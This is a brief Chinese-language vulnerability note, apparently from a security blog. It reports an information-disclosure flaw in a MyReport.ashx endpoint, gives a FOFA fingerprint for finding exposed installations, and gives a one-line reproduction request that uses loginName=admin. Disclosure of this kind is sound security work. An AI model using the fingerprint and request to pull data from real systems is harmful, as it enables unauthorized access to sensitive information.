声明:
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
简介
MyReport.ashx接口存在敏感信息泄露
资产搜索
fofa:
body="JS/ligerComboBox/ligerTree.js"
漏洞复现
http://127.0.0.1/FunctionModular/PersonalReport/Ajax/MyReport.ashx?type=3&loginName=admin